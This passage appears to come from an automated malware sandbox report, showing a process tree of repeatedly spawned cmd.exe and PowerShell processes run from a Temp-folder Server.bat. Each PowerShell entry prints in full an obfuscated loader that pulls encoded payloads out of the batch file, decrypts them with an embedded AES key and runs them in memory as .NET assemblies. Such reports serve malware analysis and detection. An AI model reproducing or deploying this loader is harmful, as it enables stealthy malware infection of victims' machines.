$dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        98⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1892
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        96⤵
        
        PID:2548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        97⤵
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        95⤵
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        96⤵
        
        PID:2124
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        94⤵
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        95⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        93⤵
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        94⤵
        
        PID:2140
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        92⤵
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        93⤵
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        91⤵
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        92⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1964
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        90⤵
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        91⤵
        
        PID:2196
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        89⤵
        
        PID:1396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        90⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        88⤵
        
        PID:1792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        89⤵
        
        PID:2272
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        87⤵
        
        PID:2520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        88⤵
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        86⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        87⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2524
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        85⤵
        
        PID:2640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        86⤵
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        84⤵
        
        PID:1724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
